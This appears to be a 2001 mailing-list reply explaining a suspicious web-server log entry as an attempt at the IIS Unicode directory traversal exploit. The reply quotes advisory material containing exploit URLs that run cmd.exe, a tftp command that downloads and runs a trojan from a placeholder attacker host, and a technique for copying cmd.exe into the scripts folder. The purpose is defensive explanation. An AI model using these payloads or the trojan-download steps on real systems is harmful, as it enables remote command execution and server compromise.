RE: Off Topic Code Red Question

[Steve Leach]

Wes,   This looks very much like someone attempting to use the so called 'double dot com' exploit (or the Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability) in IIS to get a shell from which to hack a system. There is more information below from Security Focus:   http://target/scripts/..%c1%1c../path/file.ext Eg. http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir http://target/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir http://target/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/ cmd.exe?/c+dir Zoa_Chien <[EMAIL PROTECTED]> describes the following exploits using TFTP or Samba in his post to Bugtraq: By using tftp.exe that comes with NT and win2k by connecting and downloading a trojan from a tftp daemon you can bypass these restrictions. Install < ftp://ftp.cavebear.com/karl/tftpd32.zip > and connect from your compromised to your local machine using the command " tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe ". You van do so wiith this url: /[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe then all you have to do is run the trojan with: /[bin-dir]/..%c0%af../winnt/system32/ncx99.exe You might also use the samba commands: "net share and net user" on the target and "net use" on the local machine... but this does not always seem to work. (coz. netbios is not installed?) In their post to Bugtraq, Nsfocus Security Team <[EMAIL PROTECTED]> describes how to execute commands using a redirect on the target host: (1) copy "..\..\winnt\system32\cmd.exe" to "..\..\interpub\scripts\cmd1.exe" http://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe IIS returned : "CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: 1 file(s) copied."       ----- Original Message ----- From: "Wes Stewart" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Friday, August 31, 2001 11:36 PM Subject: Off Topic Code Red Question > --------------------- Attention ----------------------------- > A digest version of this list is now available. > Send email to [EMAIL PROTECTED], with the following message: > subscribe gb-users-digest your_email_address > Then unsubscribe from this list. > ------------------------------------------------------------- > GNAT Box User Forum http://www.gnatbox.com/cgi-bin/Ultimate.cgi > Send postings to: [EMAIL PROTECTED] > Access the list archives at: http://www.gnatbox.com/gb-users/ > ------------------------------------------------------------- > Had the following line and more like it in my web server's error log > > [Fri Aug 31 08:58:06 2001] [error] [client 204.142.159.200] File does not > exist: > /usr/local/etc/httpd/htdocs/iisadmpwd/..��../..��../..��../winnt/system32/cm > d.exe > > Anyone know if this is Code Red trying to run, or is it someone else trying > to cause havoc?  The web server is Apache running on Solaris so I know they > aren't going to get anywhere with this tact. > > > > Wes Stewart > IT Manager > Cruise America > > > ---------------------------------------------- > To Unsubscribe: send mail to [EMAIL PROTECTED] > with "unsubscribe gb-users your_email_address > in the body of the message Best Regards,   Steve Leach Network Manager Miami International Limited Eaglescliffe Logistics Centre Durham Lane Egglescliffe URL: http://www.askalix.com TEL: 01642 356205 e-mail: [EMAIL PROTECTED]